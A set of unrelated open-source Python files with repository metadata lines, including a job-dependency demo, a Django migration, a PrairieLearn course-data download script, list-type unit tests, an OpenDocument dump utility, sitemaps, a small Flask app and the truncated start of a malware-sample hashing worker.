jobs_l.append(Job(4, Job.STATUS_COMPLETED, 17))
jobs_l.append(Job(5, Job.STATUS_DELETED))
jobs_l.append(Job(6, Job.STATUS_EXITING))
for job in jobs_l:
print(job)
dependencies = [
"terminated(1) and completed(4)",
"terminated(1) or completed(4)",
"completed(4) or terminated(1)",
"deleted(5) and completed(4)",
"deleted(5) and completed(4, 13)",
"deleted(5) and completed(4, 17)",
"deleted(25) and completed(4, 17)",
"completed(4, 13) and deleted(25)",
"completed(4, 17) and deleted(25)",
"completed(4, 17) or deleted(25)",
"completed(4, 17) or not deleted(25)",
"terminated(4) or not completed(60, 8)",
]
d = LiteBS_DependencyHandler()
#for dependency in dependencies:
# print repr(dependency)
# print
import sys
print("Depended jobs:")
depended_job_ids = set()
for dependency in dependencies:
print(dependency)
try:
d.depended_job_ids(dependency, depended_job_ids)
except:
error_type, error, tb = sys.exc_info()
sys.stderr.write("ERR: {0}: {1}\n".format(error_type.__name__, error))
print("Depended jobs=", depended_job_ids)
input("...")
jobs_d = dict((job.job_id, job) for job in jobs_l)
print("Validation:")
for dependency in dependencies:
try:
d.validate(dependency, jobs_d)
except:
error_type, error, tb = sys.exc_info()
sys.stderr.write("ERR: {0}: {1}\n".format(error_type.__name__, error))
input("...")
print("Evaluation:")
for dependency in dependencies:
try:
value, mutable = d.evaluate(dependency, jobs_d)
except DependencyError as error:
print("{0}: ERR: {1}".format(dependency, error))
continue
except:
error_type, error, tb = sys.exc_info()
print("{0}: ERR: {1}: {2}".format(dependency, error_type.__name__, error))
continue
print("{0:<40s} -> value={1:5} mutable={2:5}".format(dependency, value, mutable))
| simone-campagna/LiteBS | lib/python/LiteBS/litebs_dependency_handler.py | Python | apache-2.0 | 7,541 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import datetime
class Migration(migrations.Migration):
dependencies = [
('delivery', '0049_auto_20151219_1605'),
]
operations = [
migrations.AlterField(
model_name='delivery',
name='name',
field=models.CharField(default=b'2016-05-05T21:44:40.887659', max_length=128, null=True, verbose_name='\u0418\u043c\u044f \u0440\u0430\u0441\u0441\u044b\u043b\u043a\u0438', blank=True),
),
migrations.AlterField(
model_name='mailaccount',
name='auto_active_datetime',
field=models.DateTimeField(default=datetime.datetime(2016, 5, 5, 21, 44, 40, 879821), verbose_name='\u0414\u0430\u0442\u0430 \u0437\u0430\u043a\u0440\u044b\u0442\u0438\u044f \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430'),
),
]
| AlexStarov/Shop | applications/delivery/migrations/0050_auto_20160505_2144.py | Python | apache-2.0 | 925 |
#!/usr/bin/env python
import os, time, requests, argparse, datetime
def main():
parser = argparse.ArgumentParser(description='Download all PrairieLearn course data as JSON via the API')
parser.add_argument('-t', '--token', required=True, help='the API token from PrairieLearn')
parser.add_argument('-i', '--course-instance-id', required=True, help='the course instance ID to download')
parser.add_argument('-o', '--output-dir', required=True, help='the output directory to store JSON into (will be created if necessary)')
parser.add_argument('-s', '--server', help='the server API address', default='https://prairielearn.engr.illinois.edu/pl/api/v1')
args = parser.parse_args()
print(f'ensure that {args.output_dir} directory exists...')
os.makedirs(args.output_dir, exist_ok=True)
print(f'successfully ensured directory existence')
logfilename = os.path.join(args.output_dir, 'download_log.txt')
print(f'opening log file {logfilename} ...')
with open(logfilename, 'wt') as logfile:
print(f'successfully opened log file')
download_course_instance(args, logfile)
def download_course_instance(args, logfile):
log(logfile, f'starting download at {local_iso_time()} ...')
start_time = time.time()
course_instance_path = f'/course_instances/{args.course_instance_id}'
gradebook = get_and_save_json(f'{course_instance_path}/gradebook', 'gradebook', args, logfile)
assessments = get_and_save_json(f'{course_instance_path}/assessments', 'assessments', args, logfile)
for assessment in assessments:
assessment_instances = get_and_save_json(f'{course_instance_path}/assessments/{assessment["assessment_id"]}/assessment_instances', f'assessment_{assessment["assessment_id"]}_assessment_instances', args, logfile)
for assessment_instance in assessment_instances:
submissions = get_and_save_json(f'{course_instance_path}/assessment_instances/{assessment_instance["assessment_instance_id"]}/submissions', f'assessment_instance_{assessment_instance["assessment_instance_id"]}_submissions', args, logfile)
end_time = time.time()
log(logfile, f'successfully completed downloaded at {local_iso_time()}')
log(logfile, f'total time elapsed: {end_time - start_time} seconds')
def get_and_save_json(path, filename, args, logfile):
url = args.server + path
headers = {'Private-Token': args.token}
log(logfile, f'downloading {url} ...')
start_time = time.time()
r = requests.get(url, headers=headers)
if r.status_code != 200:
raise Exception(f'Invalid status returned for {url}: {r.status_code}')
end_time = time.time()
log(logfile, f'successfully downloaded {r.headers["content-length"]} bytes in {end_time - start_time} seconds')
full_filename = os.path.join(args.output_dir, filename + '.json')
log(logfile, f'saving data to {full_filename} ...')
with open(full_filename, 'wt') as out_f:
out_f.write(r.text)
log(logfile, f'successfully wrote data')
log(logfile, f'parsing data as JSON...')
data = r.json()
log(logfile, f'successfully parsed JSON')
return data
def log(logfile, message):
logfile.write(message + '\n')
logfile.flush()
print(message)
def local_iso_time():
utc_dt = datetime.datetime.now(datetime.timezone.utc)
dt = utc_dt.astimezone()
return dt.isoformat()
if __name__ == '__main__':
main()
| rbessick5/PrairieLearn | tools/api_download.py | Python | agpl-3.0 | 3,432 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from haystack import indexes
from machina.core.db.models import get_model
Post = get_model('forum_conversation', 'Post')
class PostIndex(indexes.SearchIndex, indexes.Indexable):
"""
Defines the data stored in the Post indexes.
"""
text = indexes.CharField(
document=True, use_template=True, template_name='forum_search/post_text.txt')
poster = indexes.IntegerField(model_attr='poster_id', null=True)
poster_name = indexes.CharField()
forum = indexes.IntegerField(model_attr='topic__forum_id')
forum_slug = indexes.CharField()
forum_name = indexes.CharField()
topic = indexes.IntegerField(model_attr='topic_id')
topic_slug = indexes.CharField()
topic_subject = indexes.CharField()
created = indexes.DateTimeField(model_attr='created')
updated = indexes.DateTimeField(model_attr='updated')
def get_model(self):
return Post
def prepare_poster_name(self, obj):
return obj.poster.username if obj.poster else obj.username
def prepare_forum_slug(self, obj):
return obj.topic.forum.slug
def prepare_forum_name(self, obj):
return obj.topic.forum.name
def prepare_topic_slug(self, obj):
return obj.topic.slug
def prepare_topic_subject(self, obj):
return obj.topic.subject
def index_queryset(self, using=None):
return Post.objects.all().exclude(approved=False)
def read_queryset(self, using=None):
return Post.objects.all().exclude(approved=False).select_related('topic', 'poster')
| franga2000/django-machina | machina/apps/forum_search/search_indexes.py | Python | bsd-3-clause | 1,614 |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# Copyright (c) 2009 Ars Aperta, Itaapy, Pierlis, Talend.
#
# Authors: Hervé Cauwelier <herve@itaapy.com>
# David Versmisse <david.versmisse@itaapy.com>
#
# This file is part of Lpod (see: http://lpod-project.org).
# Lpod is free software; you can redistribute it and/or modify it under
# the terms of either:
#
# a) the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option)
# any later version.
# Lpod is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Lpod. If not, see <http://www.gnu.org/licenses/>.
#
# b) the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Import from the standard library
from optparse import OptionParser
from os import mkdir, makedirs
from os.path import join, exists
from shutil import rmtree
from sys import exit, stdout
# Import from lpod
from lpod import __version__
from lpod.document import odf_get_document
from lpod.scriptutils import add_option_output, printerr
from lpod.scriptutils import check_target_directory
def clean_filename(filename):
filename = filename.encode('utf-8')
allowed_characters = set([u'.', u'-', u'_', u'@'])
result = []
for c in filename:
if c not in allowed_characters and not c.isalnum():
result.append('_')
else:
result.append(c)
return ''.join(result)
def dump(txt, to_file):
try:
encoding = to_file.encoding if to_file.encoding else 'utf-8'
except AttributeError:
encoding = 'utf-8'
txt = txt.encode(encoding)
to_file.write(txt)
def dump_pictures(document, target):
for part_name in document.get_parts():
if part_name.startswith('Pictures/'):
path = join(target, "Pictures")
if not exists(path):
mkdir(path)
data = document.get_part(part_name)
encoding = stdout.encoding if stdout.encoding else 'utf-8'
path = join(target, part_name.encode(encoding))
to_file = open(path, 'wb')
to_file.write(data)
def spreadsheet_to_stdout(document):
encoding = stdout.encoding
if encoding is None:
encoding = 'utf-8'
body = document.get_body()
for table in body.get_table_list():
table.rstrip_table(aggressive=True)
table.export_to_csv(stdout, encoding=encoding)
stdout.write("\n")
stdout.flush()
def spreadsheet_to_csv(document, target):
body = document.get_body()
for table in body.get_table_list():
name = table.get_table_name()
filename = clean_filename(name) + '.csv'
csv_file = open(join(target, filename), 'wb')
table.rstrip_table(aggressive=True)
table.export_to_csv(csv_file)
csv_file.close()
if __name__ == '__main__':
# Options initialisation
usage = ('%prog [--styles] [--meta] [--no-content] [--rst] <file>\n'
' %prog -o <DIR> [--rst] <file>')
description = ("Dump text from an OpenDocument file to the standard "
"output, optionally styles and meta (and the Pictures/* in "
'"-o <DIR>" mode)')
parser = OptionParser(usage, version=__version__,
description=description)
# --meta
parser.add_option('-m', '--meta', action='store_true', default=False,
help='dump metadata to stdout')
# --styles
parser.add_option('-s', '--styles', action='store_true', default=False,
help='dump styles to stdout')
# --no-content
parser.add_option('-n', '--no-content', action='store_true',
default=False, help='do not dump content to stdout')
# --rst
parser.add_option('-r', '--rst', action='store_true', default=False,
help='Dump the content file with a reST syntax')
# --output
add_option_output(parser, metavar="DIR")
# Parse !
options, args = parser.parse_args()
# Container
if len(args) != 1:
parser.print_help()
exit(1)
container_url = args[0]
# Open it!
document = odf_get_document(container_url)
doc_type = document.get_type()
if options.output:
target = options.output
check_target_directory(target)
if exists(target):
rmtree(target)
makedirs(target)
# Meta
to_file = open(join(target, 'meta.txt'), 'wb')
dump(document.get_formated_meta(), to_file)
# Styles
to_file = open(join(target, 'styles.txt'), 'wb')
dump(document.show_styles(), to_file)
# Pictures
dump_pictures(document, target)
else:
if options.meta:
dump(document.get_formated_meta(), stdout)
if options.styles:
dump(document.show_styles(), stdout)
# text
if doc_type in ('text', 'text-template', 'presentation',
'presentation-template'):
if options.output:
to_file = open(join(target, 'content.txt'), 'wb')
dump(document.get_formatted_text(rst_mode=options.rst), to_file)
elif not options.no_content:
dump(document.get_formatted_text(rst_mode=options.rst), stdout)
# spreadsheet
elif doc_type in ('spreadsheet', 'spreadsheet-template'):
if options.output:
spreadsheet_to_csv(document, target)
elif not options.no_content:
spreadsheet_to_stdout(document)
else:
printerr("The OpenDocument format", doc_type, "is not supported yet.")
exit(1)
| uliss/quneiform | tests/py/lpod/scripts/lpod-show.py | Python | gpl-3.0 | 5,959 |
# This file taken from Python, licensed under the Python License Agreement
from __future__ import print_function
"""
Tests common to list and UserList.UserList
"""
import sys
import os
from blist.test import unittest
from blist.test import test_support
from blist.test import seq_tests
from decimal import Decimal
def CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
class CommonTest(seq_tests.CommonTest):
def test_init(self):
# Iterable arg is optional
self.assertEqual(self.type2test([]), self.type2test())
# Init clears previous values
a = self.type2test([1, 2, 3])
a.__init__()
self.assertEqual(a, self.type2test([]))
# Init overwrites previous values
a = self.type2test([1, 2, 3])
a.__init__([4, 5, 6])
self.assertEqual(a, self.type2test([4, 5, 6]))
# Mutables always return a new object
b = self.type2test(a)
self.assertNotEqual(id(a), id(b))
self.assertEqual(a, b)
def test_repr(self):
l0 = []
l2 = [0, 1, 2]
a0 = self.type2test(l0)
a2 = self.type2test(l2)
self.assertEqual(str(a0), 'blist(%s)' % str(l0))
self.assertEqual(repr(a0), 'blist(%s)' % repr(l0))
self.assertEqual(repr(a2), 'blist(%s)' % repr(l2))
self.assertEqual(str(a2), "blist([0, 1, 2])")
self.assertEqual(repr(a2), "blist([0, 1, 2])")
a2.append(a2)
a2.append(3)
self.assertEqual(str(a2), "blist([0, 1, 2, [...], 3])")
self.assertEqual(repr(a2), "blist([0, 1, 2, [...], 3])")
def test_print(self):
d = self.type2test(range(200))
d.append(d)
d.extend(range(200,400))
d.append(d)
d.append(400)
try:
fo = open(test_support.TESTFN, "w")
fo.write(str(d))
fo.close()
fo = open(test_support.TESTFN, "r")
self.assertEqual(fo.read(), repr(d))
finally:
fo.close()
os.remove(test_support.TESTFN)
def test_set_subscript(self):
a = self.type2test(list(range(20)))
self.assertRaises(ValueError, a.__setitem__, slice(0, 10, 0), [1,2,3])
self.assertRaises(TypeError, a.__setitem__, slice(0, 10), 1)
self.assertRaises(ValueError, a.__setitem__, slice(0, 10, 2), [1,2])
self.assertRaises(TypeError, a.__getitem__, 'x', 1)
a[slice(2,10,3)] = [1,2,3]
self.assertEqual(a, self.type2test([0, 1, 1, 3, 4, 2, 6, 7, 3,
9, 10, 11, 12, 13, 14, 15,
16, 17, 18, 19]))
def test_reversed(self):
a = self.type2test(list(range(20)))
r = reversed(a)
self.assertEqual(list(r), self.type2test(list(range(19, -1, -1))))
if hasattr(r, '__next__'): # pragma: no cover
self.assertRaises(StopIteration, r.__next__)
else: # pragma: no cover
self.assertRaises(StopIteration, r.next)
self.assertEqual(list(reversed(self.type2test())),
self.type2test())
def test_setitem(self):
a = self.type2test([0, 1])
a[0] = 0
a[1] = 100
self.assertEqual(a, self.type2test([0, 100]))
a[-1] = 200
self.assertEqual(a, self.type2test([0, 200]))
a[-2] = 100
self.assertEqual(a, self.type2test([100, 200]))
self.assertRaises(IndexError, a.__setitem__, -3, 200)
self.assertRaises(IndexError, a.__setitem__, 2, 200)
a = self.type2test([])
self.assertRaises(IndexError, a.__setitem__, 0, 200)
self.assertRaises(IndexError, a.__setitem__, -1, 200)
self.assertRaises(TypeError, a.__setitem__)
a = self.type2test([0,1,2,3,4])
a[0] = 1
a[1] = 2
a[2] = 3
self.assertEqual(a, self.type2test([1,2,3,3,4]))
a[0] = 5
a[1] = 6
a[2] = 7
self.assertEqual(a, self.type2test([5,6,7,3,4]))
a[-2] = 88
a[-1] = 99
self.assertEqual(a, self.type2test([5,6,7,88,99]))
a[-2] = 8
a[-1] = 9
self.assertEqual(a, self.type2test([5,6,7,8,9]))
def test_delitem(self):
a = self.type2test([0, 1])
del a[1]
self.assertEqual(a, [0])
del a[0]
self.assertEqual(a, [])
a = self.type2test([0, 1])
del a[-2]
self.assertEqual(a, [1])
del a[-1]
self.assertEqual(a, [])
a = self.type2test([0, 1])
self.assertRaises(IndexError, a.__delitem__, -3)
self.assertRaises(IndexError, a.__delitem__, 2)
a = self.type2test([])
self.assertRaises(IndexError, a.__delitem__, 0)
self.assertRaises(TypeError, a.__delitem__)
def test_setslice(self):
l = [0, 1]
a = self.type2test(l)
for i in range(-3, 4):
a[:i] = l[:i]
self.assertEqual(a, l)
a2 = a[:]
a2[:i] = a[:i]
self.assertEqual(a2, a)
a[i:] = l[i:]
self.assertEqual(a, l)
a2 = a[:]
a2[i:] = a[i:]
self.assertEqual(a2, a)
for j in range(-3, 4):
a[i:j] = l[i:j]
self.assertEqual(a, l)
a2 = a[:]
a2[i:j] = a[i:j]
self.assertEqual(a2, a)
aa2 = a2[:]
aa2[:0] = [-2, -1]
self.assertEqual(aa2, [-2, -1, 0, 1])
aa2[0:] = []
self.assertEqual(aa2, [])
a = self.type2test([1, 2, 3, 4, 5])
a[:-1] = a
self.assertEqual(a, self.type2test([1, 2, 3, 4, 5, 5]))
a = self.type2test([1, 2, 3, 4, 5])
a[1:] = a
self.assertEqual(a, self.type2test([1, 1, 2, 3, 4, 5]))
a = self.type2test([1, 2, 3, 4, 5])
a[1:-1] = a
self.assertEqual(a, self.type2test([1, 1, 2, 3, 4, 5, 5]))
a = self.type2test([])
a[:] = tuple(range(10))
self.assertEqual(a, self.type2test(list(range(10))))
if sys.version_info[0] < 3:
self.assertRaises(TypeError, a.__setslice__, 0, 1, 5)
self.assertRaises(TypeError, a.__setslice__)
def test_delslice(self):
a = self.type2test([0, 1])
del a[1:2]
del a[0:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[1:2]
del a[0:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[-2:-1]
self.assertEqual(a, self.type2test([1]))
a = self.type2test([0, 1])
del a[-2:-1]
self.assertEqual(a, self.type2test([1]))
a = self.type2test([0, 1])
del a[1:]
del a[:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[1:]
del a[:1]
self.assertEqual(a, self.type2test([]))
a = self.type2test([0, 1])
del a[-1:]
self.assertEqual(a, self.type2test([0]))
a = self.type2test([0, 1])
del a[-1:]
self.assertEqual(a, self.type2test([0]))
a = self.type2test([0, 1])
del a[:]
self.assertEqual(a, self.type2test([]))
def test_append(self):
a = self.type2test([])
a.append(0)
a.append(1)
a.append(2)
self.assertEqual(a, self.type2test([0, 1, 2]))
self.assertRaises(TypeError, a.append)
def test_extend(self):
a1 = self.type2test([0])
a2 = self.type2test((0, 1))
a = a1[:]
a.extend(a2)
self.assertEqual(a, a1 + a2)
a.extend(self.type2test([]))
self.assertEqual(a, a1 + a2)
a.extend(a)
self.assertEqual(a, self.type2test([0, 0, 1, 0, 0, 1]))
a = self.type2test("spam")
a.extend("eggs")
self.assertEqual(a, list("spameggs"))
self.assertRaises(TypeError, a.extend, None)
self.assertRaises(TypeError, a.extend)
def test_insert(self):
a = self.type2test([0, 1, 2])
a.insert(0, -2)
a.insert(1, -1)
a.insert(2, 0)
self.assertEqual(a, [-2, -1, 0, 0, 1, 2])
b = a[:]
b.insert(-2, "foo")
b.insert(-200, "left")
b.insert(200, "right")
self.assertEqual(b, self.type2test(["left",-2,-1,0,0,"foo",1,2,"right"]))
self.assertRaises(TypeError, a.insert)
def test_pop(self):
a = self.type2test([-1, 0, 1])
a.pop()
self.assertEqual(a, [-1, 0])
a.pop(0)
self.assertEqual(a, [0])
self.assertRaises(IndexError, a.pop, 5)
a.pop(0)
self.assertEqual(a, [])
self.assertRaises(IndexError, a.pop)
self.assertRaises(TypeError, a.pop, 42, 42)
a = self.type2test([0, 10, 20, 30, 40])
def test_remove(self):
a = self.type2test([0, 0, 1])
a.remove(1)
self.assertEqual(a, [0, 0])
a.remove(0)
self.assertEqual(a, [0])
a.remove(0)
self.assertEqual(a, [])
self.assertRaises(ValueError, a.remove, 0)
self.assertRaises(TypeError, a.remove)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
a = self.type2test([0, 1, 2, 3])
self.assertRaises(BadExc, a.remove, BadCmp())
class BadCmp2:
def __eq__(self, other):
raise BadExc()
d = self.type2test('abcdefghcij')
d.remove('c')
self.assertEqual(d, self.type2test('abdefghcij'))
d.remove('c')
self.assertEqual(d, self.type2test('abdefghij'))
self.assertRaises(ValueError, d.remove, 'c')
self.assertEqual(d, self.type2test('abdefghij'))
# Handle comparison errors
d = self.type2test(['a', 'b', BadCmp2(), 'c'])
e = self.type2test(d)
self.assertRaises(BadExc, d.remove, 'c')
for x, y in zip(d, e):
# verify that original order and values are retained.
self.assert_(x is y)
def test_count(self):
a = self.type2test([0, 1, 2])*3
self.assertEqual(a.count(0), 3)
self.assertEqual(a.count(1), 3)
self.assertEqual(a.count(3), 0)
self.assertRaises(TypeError, a.count)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
self.assertRaises(BadExc, a.count, BadCmp())
def test_index(self):
u = self.type2test([0, 1])
self.assertEqual(u.index(0), 0)
self.assertEqual(u.index(1), 1)
self.assertRaises(ValueError, u.index, 2)
u = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(u.count(0), 2)
self.assertEqual(u.index(0), 2)
self.assertEqual(u.index(0, 2), 2)
self.assertEqual(u.index(-2, -10), 0)
self.assertEqual(u.index(0, 3), 3)
self.assertEqual(u.index(0, 3, 4), 3)
self.assertRaises(ValueError, u.index, 2, 0, -10)
self.assertRaises(TypeError, u.index)
class BadExc(Exception):
pass
class BadCmp:
def __eq__(self, other):
if other == 2:
raise BadExc()
return False
a = self.type2test([0, 1, 2, 3])
self.assertRaises(BadExc, a.index, BadCmp())
a = self.type2test([-2, -1, 0, 0, 1, 2])
self.assertEqual(a.index(0), 2)
self.assertEqual(a.index(0, 2), 2)
self.assertEqual(a.index(0, -4), 2)
self.assertEqual(a.index(-2, -10), 0)
self.assertEqual(a.index(0, 3), 3)
self.assertEqual(a.index(0, -3), 3)
self.assertEqual(a.index(0, 3, 4), 3)
self.assertEqual(a.index(0, -3, -2), 3)
self.assertEqual(a.index(0, -4*sys.maxsize, 4*sys.maxsize), 2)
self.assertRaises(ValueError, a.index, 0, 4*sys.maxsize,-4*sys.maxsize)
self.assertRaises(ValueError, a.index, 2, 0, -10)
a.remove(0)
self.assertRaises(ValueError, a.index, 2, 0, 4)
self.assertEqual(a, self.type2test([-2, -1, 0, 1, 2]))
# Test modifying the list during index's iteration
class EvilCmp:
def __init__(self, victim):
self.victim = victim
def __eq__(self, other):
del self.victim[:]
return False
a = self.type2test()
a[:] = [EvilCmp(a) for _ in range(100)]
# This used to seg fault before patch #1005778
self.assertRaises(ValueError, a.index, None)
def test_reverse(self):
u = self.type2test([-2, -1, 0, 1, 2])
u2 = u[:]
u.reverse()
self.assertEqual(u, [2, 1, 0, -1, -2])
u.reverse()
self.assertEqual(u, u2)
self.assertRaises(TypeError, u.reverse, 42)
def test_clear(self):
u = self.type2test([2, 3, 4])
u.clear()
self.assertEqual(u, [])
u = self.type2test([])
u.clear()
self.assertEqual(u, [])
u = self.type2test([])
u.append(1)
u.clear()
u.append(2)
self.assertEqual(u, [2])
self.assertRaises(TypeError, u.clear, None)
def test_copy(self):
u = self.type2test([1, 2, 3])
v = u.copy()
self.assertEqual(v, [1, 2, 3])
u = self.type2test([])
v = u.copy()
self.assertEqual(v, [])
# test that it's indeed a copy and not a reference
u = self.type2test(['a', 'b'])
v = u.copy()
v.append('i')
self.assertEqual(u, ['a', 'b'])
self.assertEqual(v, u + self.type2test(['i']))
# test that it's a shallow, not a deep copy
u = self.type2test([1, 2, [3, 4], 5])
v = u.copy()
self.assertEqual(u, v)
self.assertIs(v[3], u[3])
self.assertRaises(TypeError, u.copy, None)
def test_sort(self):
u = self.type2test([1, 0])
u.sort()
self.assertEqual(u, [0, 1])
u = self.type2test([2,1,0,-1,-2])
u.sort()
self.assertEqual(u, self.type2test([-2,-1,0,1,2]))
self.assertRaises(TypeError, u.sort, 42, 42)
a = self.type2test(reversed(list(range(512))))
a.sort()
self.assertEqual(a, self.type2test(list(range(512))))
def revcmp(a, b): # pragma: no cover
if a == b:
return 0
elif a < b:
return 1
else: # a > b
return -1
u.sort(key=CmpToKey(revcmp))
self.assertEqual(u, self.type2test([2,1,0,-1,-2]))
# The following dumps core in unpatched Python 1.5:
def myComparison(x,y):
xmod, ymod = x%3, y%7
if xmod == ymod:
return 0
elif xmod < ymod:
return -1
else: # xmod > ymod
return 1
z = self.type2test(list(range(12)))
z.sort(key=CmpToKey(myComparison))
self.assertRaises(TypeError, z.sort, 2)
def selfmodifyingComparison(x,y):
z.append(1)
return cmp(x, y)
self.assertRaises(ValueError, z.sort, key=CmpToKey(selfmodifyingComparison))
if sys.version_info[0] < 3:
self.assertRaises(TypeError, z.sort, lambda x, y: 's')
self.assertRaises(TypeError, z.sort, 42, 42, 42, 42)
def test_slice(self):
u = self.type2test("spam")
u[:2] = "h"
self.assertEqual(u, list("ham"))
def test_iadd(self):
super(CommonTest, self).test_iadd()
u = self.type2test([0, 1])
u2 = u
u += [2, 3]
self.assert_(u is u2)
u = self.type2test("spam")
u += "eggs"
self.assertEqual(u, self.type2test("spameggs"))
self.assertRaises(TypeError, u.__iadd__, None)
def test_imul(self):
u = self.type2test([0, 1])
u *= 3
self.assertEqual(u, self.type2test([0, 1, 0, 1, 0, 1]))
u *= 0
self.assertEqual(u, self.type2test([]))
s = self.type2test([])
oldid = id(s)
s *= 10
self.assertEqual(id(s), oldid)
def test_extendedslicing(self):
# subscript
a = self.type2test([0,1,2,3,4])
# deletion
del a[::2]
self.assertEqual(a, self.type2test([1,3]))
a = self.type2test(list(range(5)))
del a[1::2]
self.assertEqual(a, self.type2test([0,2,4]))
a = self.type2test(list(range(5)))
del a[1::-2]
self.assertEqual(a, self.type2test([0,2,3,4]))
a = self.type2test(list(range(10)))
del a[::1000]
self.assertEqual(a, self.type2test([1, 2, 3, 4, 5, 6, 7, 8, 9]))
# assignment
a = self.type2test(list(range(10)))
a[::2] = [-1]*5
self.assertEqual(a, self.type2test([-1, 1, -1, 3, -1, 5, -1, 7, -1, 9]))
a = self.type2test(list(range(10)))
a[::-4] = [10]*3
self.assertEqual(a, self.type2test([0, 10, 2, 3, 4, 10, 6, 7, 8 ,10]))
a = self.type2test(list(range(4)))
a[::-1] = a
self.assertEqual(a, self.type2test([3, 2, 1, 0]))
a = self.type2test(list(range(10)))
b = a[:]
c = a[:]
a[2:3] = self.type2test(["two", "elements"])
b[slice(2,3)] = self.type2test(["two", "elements"])
c[2:3:] = self.type2test(["two", "elements"])
self.assertEqual(a, b)
self.assertEqual(a, c)
a = self.type2test(list(range(10)))
a[::2] = tuple(range(5))
self.assertEqual(a, self.type2test([0, 1, 1, 3, 2, 5, 3, 7, 4, 9]))
def test_constructor_exception_handling(self):
# Bug #1242657
class Iter(object):
def next(self):
raise KeyboardInterrupt
__next__ = next
class F(object):
def __iter__(self):
return Iter()
self.assertRaises(KeyboardInterrupt, self.type2test, F())
def test_sort_cmp(self):
u = self.type2test([1, 0])
u.sort()
self.assertEqual(u, [0, 1])
u = self.type2test([2,1,0,-1,-2])
u.sort()
self.assertEqual(u, self.type2test([-2,-1,0,1,2]))
self.assertRaises(TypeError, u.sort, 42, 42)
if sys.version_info[0] >= 3:
return # Python 3 removed the cmp option for sort.
def revcmp(a, b):
return cmp(b, a)
u.sort(revcmp)
self.assertEqual(u, self.type2test([2,1,0,-1,-2]))
# The following dumps core in unpatched Python 1.5:
def myComparison(x,y):
return cmp(x%3, y%7)
z = self.type2test(range(12))
z.sort(myComparison)
self.assertRaises(TypeError, z.sort, 2)
def selfmodifyingComparison(x,y):
z.append(1)
return cmp(x, y)
self.assertRaises(ValueError, z.sort, selfmodifyingComparison)
self.assertRaises(TypeError, z.sort, lambda x, y: 's')
self.assertRaises(TypeError, z.sort, 42, 42, 42, 42)
| pfmoore/blist | blist/test/list_tests.py | Python | bsd-3-clause | 19,502 |
# -*- coding: utf-8 -*-
'''
andaluciapeople.com
Copyright (C) 2008-2009 Manuel Martín Salvador <draxus@gmail.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from django.contrib.sitemaps import Sitemap
from andaluciapeople.sitios.models import *
from localeurl.utils import locale_url
class SitioSitemap(Sitemap):
changefreq = 'weekly'
priority = 0.5
def __init__(self, language):
self.language = language
def items(self):
return Sitio.objects.all()
def lastmod(self, obj):
return obj.fecha
def location(self, obj):
return locale_url(obj.get_absolute_url(), self.language)
class UsuarioSitemap(Sitemap):
changefreq = 'weekly'
priority = 0.5
def __init__(self, language):
self.language = language
def items(self):
return DatosUsuario.objects.all()
def lastmod(self, obj):
return obj.user.last_login
def location(self, obj):
return locale_url(obj.get_absolute_url(), self.language)
| DraXus/andaluciapeople | sitios/sitemaps.py | Python | agpl-3.0 | 1,680 |
import os
from adapters import infoVk
import sqlite3
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash
app = Flask(__name__)
app.config.from_object('config.DevelopConfig')
app.config.update(dict(
DATABASE=os.path.join(app.root_path, 'bigeyebot.db'),
))
def connect_db():
"""Connects to the specific database."""
rv = sqlite3.connect(app.config['DATABASE'])
rv.row_factory = sqlite3.Row
return rv
def get_db():
"""Opens a new database connection if there is none yet for the
current application context.
"""
if not hasattr(g, 'sqlite_db'):
g.sqlite_db = connect_db()
return g.sqlite_db
@app.teardown_appcontext
def close_db(error):
"""Closes the database again at the end of the request."""
if hasattr(g, 'sqlite_db'):
g.sqlite_db.close()
def init_db():
db = get_db()
with app.open_resource('schema.sql', mode='r') as f:
db.cursor().executescript(f.read())
db.commit()
@app.cli.command('initdb')
def initdb_command():
"""Initializes the database."""
init_db()
print('Initialized the database.')
@app.route('/')
def index():
return render_template('index.html')
@app.route('/search/<client_id>')
def get_info(client_id):
info= infoVk(str(client_id)).getInfo()
return render_template('search.html' info=info)
| Wertusser/EyeProject | app.py | Python | apache-2.0 | 1,376 |
#!/usr/bin/python
"""
All filetypes that do not have a specified worker are being picked
up by this Worker. It will collect the general information and hashes
from it.
"""
#Parent
from malzoo.common.abstract import Worker
#Imports
import magic
#Malzoo imports
from time import time
from malzoo.core.tools.general_info import GeneralInformation
from malzoo.core.tools.signatures import Signatures
from malzoo.core.tools.hashes import Hasher
class OtherWorker(Worker):
def process(self, sample):
try:
hasher = Hasher(sample['filename'])
general_info = GeneralInformation(sample['filename'])
sigs_yara = Signatures()
mymagic = magic.Magic(mime=True)
sample_info = {
'filename' : general_info.get_filename(),
'filetype' : mymagic.from_file(sample['filename']),
'filesize' : str(general_info.get_filesize()),
'md5' : hasher.get_md5(),
'sha1' : hasher.get_sha1(),
